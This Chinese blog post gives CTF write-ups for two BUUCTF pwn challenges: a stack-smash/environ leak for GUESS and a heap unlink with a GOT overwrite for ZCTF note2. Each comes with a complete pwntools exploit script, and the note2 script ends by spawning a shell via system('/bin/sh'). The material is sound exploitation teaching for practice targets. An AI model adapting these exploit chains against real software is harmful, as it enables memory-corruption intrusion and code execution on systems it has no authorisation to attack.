buuctf GUESS,ZCTF note2学习

最新推荐文章于 2023-10-01 14:46:54 发布
最新推荐文章于 2023-10-01 14:46:54 发布
阅读量239 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/118615084
版权

GUESS

知识点

stack smash\environ泄露栈地址

题解

这道题是一道栈题,好久没见栈题。
可以看到程序会把flag读入内存,之后fork子进程让你猜。这里需要事先了解fork工作方式:把父进程虚拟内存空间完全复制一份(具体来说,私有写时复制)这说明子进程会复制flag,以及栈上所有内容。利用这一点以及题目给我们的三次机会,结合canary smash原理解题。
stack smash之后会输出一串字符串,其地址是environ[0]。基本思路是通过gets()栈溢出,修改environ[0]地址,这样就可以通过stack_smash打印出想要的内容。
environ[0]与输入buffer之间的偏移可以调试得到
在这里插入图片描述依次泄露puts_plt,得到libc基地址,system地址,再泄露栈上environ地址,最后计算environ[0]和内存中flag的偏移,就得到flag在栈上地址,即可泄露打印。均利用stack_smash
这里记住:直接在gdb里面输入environ即可得到environ[0]地址,也就是上图第二个红框0x7ffffffffe138

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
elf = ELF('./GUESS')
# libc = ELF('./libc-2.23.so')
io = remote('node4.buuoj.cn',25298)
# io = process('./GUESS')

puts_got = elf.got['puts']



def leak_addr(content):
    io.recvline()
    io.sendline(content)
    io.recvuntil('*** stack smashing detected ***: ')
    addr = u64(io.recv(6).ljust(8,'\x00'))
    return addr


# step1: leak puts_addr
payload1 = 'a'*0x128+p64(puts_got)
puts_plt = leak_addr(payload1)
print "puts_plt----->" + hex(puts_plt)
libc = LibcSearcher("puts",puts_plt)
libc_base = puts_plt - libc.dump("puts")
print "libc_base----->" + hex(libc_base)
environ = libc.dump('__environ') + libc_base

# step2: leak environ
payload2 = 'a'*0x128 + p64(environ)
environ_addr = leak_addr(payload2)
print "enviorn in stack----->" + hex(environ_addr)

# step3: leak flag
payload3 = 'a'*0x128 + p64(environ_addr-0x168)
io.sendlineafter('Please type your guessing flag\n',payload3)
print io.recvline()

note2

这道题在wiki上也有,但是之前看了没看懂。搞了快一天,最后还是问了别人才明白unlink到底是什么意思
unlink本质上是一个在双向链表中取出一个链表的过程。wiki上面也写了,在没有对unlink检查的情况下,仅仅设置FD为addr-12,BK为expect_value可以实现任意地址写。但是在有检查之后需要设置FD为ptr-34,BK为ptr-24(这里4也可以为8,取决系统位数)绕过检查。这样导致顺序执行以下两条语句(如果取出p)
p->fd->bk=p->bk->fd
p->bk->fd=p->fd->bk
第一句导致p=&p-24
第二句导致p=&p-34
所以p=&p-34这样修改了ptr中储存的值。怎么利用呢?比如说可以edit这个note(3p32(0)+puts_got)这样show(note)打印的就是note+3*4也就是puts_plt的值。这道题就是这样利用的。除此以外,还利用了整数溢出实现堆溢出,来达到unlink效果。具体解释在wiki上unlink这一章有。这里的wp主要参考了网上的。

from pwn import *
from LibcSearcher import *
# p=process("./note2")
p = remote('node4.buuoj.cn',26847)
elf=ELF("./note2")
# libc = ELF('./libc.so.6')

context.log_level="debug"

strlen_plt=elf.plt[b"strlen"]
strlen_got=elf.got[b"strlen"]
atoi_got = elf.got["atoi"]
malloc_got = elf.got['malloc']
free_got = elf.got['free']

def new(content,length):
    p.recvuntil(b'option--->>')
    p.sendline(b"1")
    p.recvuntil(b"Input the length of the note content:(less than 128)\n")
    p.sendline(str(length).encode())
    p.recvuntil(b"Input the note content:\n")
    p.sendline(content)
    pass
    
def show(idx):
    p.recvuntil(b'option--->>')
    p.sendline(b"2")
    p.recvuntil(b"Input the id of the note:\n")
    p.sendline(str(idx).encode())
    pass
    
def edit(idx,mode,content):
    p.recvuntil(b'option--->>')
    p.sendline(b"3")
    p.recvuntil(b"Input the id of the note:\n")
    p.sendline(str(idx).encode())
    p.recvuntil(b"do you want to overwrite or append?[1.overwrite/2.append]\n")
    p.sendline(str(mode).encode())
    p.recvuntil(b"TheNewContents:")
    p.sendline(content)
    pass

def delete(idx):
    p.recvuntil(b'option--->>')
    p.sendline(b"4")
    p.recvuntil(b"Input the id of the note:\n")
    p.sendline(str(idx).encode())
    pass
    
def exp():
    name=b"aaaa"
    address=b"bbbb"
    p.recvuntil(b"Input your name:\n")
    p.sendline(name)
    p.recvuntil(b"Input your address:\n")
    p.sendline(address)
    
    #1 unlink
    list_head = 0x602120
    fake_fd = list_head-0x18
    fake_bk = list_head-0x10 #result: fake_bk->fd == fake_fd
    #payload1=b"a"*8+p64(0x61)+p64(fake_fd)+p64(fake_bk)+b'a'*64+p64(0x60)
    
    payload1=b"a"*8+p64(0x21)+p64(fake_fd)+p64(fake_bk)+p64(0x20)
    new(payload1,0x40) #idx0
    new(b"b"*0x8,0) #idx1
    new(b"c"*0x10,0x80) #idx2

    # gdb.attach(p,"b *0x400C67")
    
    delete(1) # del idx1
    payload2=b"b"*0x10+p64(0x60)+p64(0x90)
    new(payload2,0) #idx3
    delete(2)

 
    
    #2 rewrite&leak
    payload3=b"d"*0x18+p64(atoi_got)
    edit(0,1,payload3)
    show(0)
    #gdb.attach(p)
    p.recvuntil(b"Content is ")
    atoi_plt = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00"))
    libc = LibcSearcher('atoi',atoi_plt)
    # print "malloc_plt----->" + hex(malloc_plt)
    libc_base = atoi_plt - libc.dump('atoi')
    print "libc_base----->" + hex(libc_base)
    system=libc_base + libc.dump('system')
    
    
    # print("strlen@got: ",hex(strlen_got))
    print ("atoi@got: ",hex(atoi_got))
    # print("strlen: ",hex(strlen))
    print("system: ",hex(system))

    # gdb.attach(p,"b *0x400D43")
    
    #3 editatoi@got to system
    payload4=p64(system)
    edit(0,1,payload4)


    p.recvuntil('option--->>')
    p.sendline('/bin/sh\x00')
    
    p.interactive()
    
    
if __name__=="__main__":
    exp()
N1ch0l4s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1282
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
攻防世界guess_num
Rt1Text的博客
03-27 503
题目 一点信息:猜数字 虚拟机里checksec
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 410
stack smash
buuctf-[Zer0pts2020]Can you guess it?
最新发布
2202_75317918的博客
10-01 366
而且这个正则匹配只匹配路径的尾巴,因此index.php/config.php/abc.php就能绕过正则,因此思路就很明确了结合上面的basename介绍,就是在末尾加上。当前绝对路径不能有config.php,因为这里是index.php的源码,正常访问config.php没有问题,但是不能访问index.php/config.php。比如现在这个文件是在var/www/html/index.php,那么$_SERVER['PHP_SELF']代表的就是index.php。通过构造URI让其包含。
CTF---Web入门第八题 Guess Next Session
weixin_33890526的博客
11-08 261
Guess Next Session分值:10 来源: iFurySt 难度:易 参与人数:3870人 Get Flag:1672人 答题人数:1690人 解题通过率:99% 写个算法没准就算出来了,23333 hint:你确定你有认真看判断条件? 格式:CTF{} 解题...
PWN 网鼎杯 GUESS
SsMing的博客
09-11 1679
拖了好久才看题,中间去参加比赛去了,休息够了开始学习啦! GUESS 在checksec查看后,发现开了canary 和 NX保护,所以可以用 stack smash 来做这个题 ida打开,查看一下源代码: 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的...
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
隐写术-guess
juling725的博客
06-27 2916
下载地址: http://download.csdn.net/download/florak/5620983?ticket=ST-390664-3IddYbfLwbg7dfr5Jn9C-passport.csdn.net 去outguess.org 也可以下得到 用于对jpeg彩色图像添加密文,和读取通过outguess添加在jpg图像中的密文。 安装方法: 1.解压,linux下c
CTF之隐写术破解总结
热门推荐
小伟锅的博客
08-26 4万+
一、隐写术可以利用图片、音频、视频为载体将数据隐藏在其中,将数据隐写到图像中较为常见。 二、图像隐写术进行数据隐写分为以下几类: 1.在图片右击-属性-详细信息中隐藏数据信息 2.将数据类型进行改写(rar类型数据 将其改写成jpg格式) 3.根据各种类型图像的固定格式,隐藏数据 修改图像开始标志,改变其原有图像格式; 在图像结束标志后加入数据; 在图
Java代码审计手册(English)
重新启程
10-14 1万+
Table of Contents Predictable pseudorandom number generator (PREDICTABLE_RANDOM) Predictable pseudorandom number generator (Scala) (PREDICTABLE_RANDOM_SCALA) Untrusted servlet parameter (SERVLET...
实验吧-隐写术-guess
底层社会中的弱智
04-14 440
题目给出参考 outguess 在kali中打开outguess工具,需要下载 git clone https://github.com/crorvick/outguess 之后再文件夹中执行 ./configure && make && make install 把图片放到outguess文件夹中,输入命令 outguess -r angrybir...
buuctf-Can you guess it?(代码审计)
m0_62094846的博客
05-15 331
random_bites:生成适合加密使用的任意长度的加密随机字节字符串 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)...
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1323
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过
weixin_44632787的博客
07-14 758
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you
[BUUCTF][Zer0pts2020]Can you guess it?
Y4tacker的博客
10-03 4670
文章目录前置知识一些学到的新函数与新变量新变量属性-PHP_SELF新php函数-basenamebasename broken with non-ASCII-charsWP部分 前置知识 一些学到的新函数与新变量 新变量属性-PHP_SELF $_SERVER['PHP_SELF'] 表示当前 php 文件相对于网站根目录的位置地址,与 document root 相关 下面是本地测试截图,也就是http://.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'] 新ph
CTF实验吧-WEB专题-4
qq_18661257的专栏
12-21 3954
1.忘记密码了 题解 通过看成step1.php的源代码,发现是通过vim编写的,一般的vim编写可能会产生遗留问题,就是一个备份文件.swp,但是直接用似乎不行,然后我们通过抓包,发送数据发现step2.php中要提交给另外一个submit.php文件,试一试.submit.php.swp是不是存在,OK,发现源代码.接下来,你懂得,源代码都知道了,还有什么好说的,根据源代码提示说不是管理员邮
ZCTF-Pwn
weixin_30677617的博客
02-17 426
版权声明:本文为博主原创文章,未经博主允许不得转载。  最近有了点时间,把ZCTF的pwn总结了下,就差最后一个pwn500,另找时间总结。 文件打包:http://files.cnblogs.com/files/wangaohui/attach.zip Pwn100 很明显栈溢出,但是有canary保护。但是明显的是flag已经被读入了内存。在网上找到了drag...
python程序的运行顺序_为什么我的python程序没有按正确的顺序运行代码?
weixin_34981697的博客
01-13 709
我刚开始用python编程,我正在根据一本书编写一个刽子手游戏。我能知道为什么我下面的代码没有按照我想要的顺序运行吗?在当我执行程序时,guess中猜测的字母应该进入used,以表明哪些字母已经被播放机猜测出来,以找出正确的单词。但是,这种情况只发生在每2圈,而不是每1圈。我已经在一个图像文件中指明了hangman ACSII程序的开始部分,以供参考,图像下方是代码。非常感谢您的帮助。谢谢!在MA...
CTF-Crypto-学习笔记
小龙在线
08-22 1万+
最常见的字符编码规范 ASCII 为了在计算机中表示字符,在设计编码的时候用1个字节也就是8bit位数来编码英文字符集 拉丁字母及标点符号 阿拉伯数字 一些控制字符 这就是 ASCII(American Standard Code for InformationInterchange, 美国信息交换标准代码) Python中,使用 chr( ) 函数可得 ASCII 对应的字符,使用 ord( ) 函数可得字符的 ASCII码。 Unicode 字符集 Unicode(万国码、统一码、国际码)用于编码
buuctf解题记录
song_10的博客
05-21 593
buuctf部分pwn题题解

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值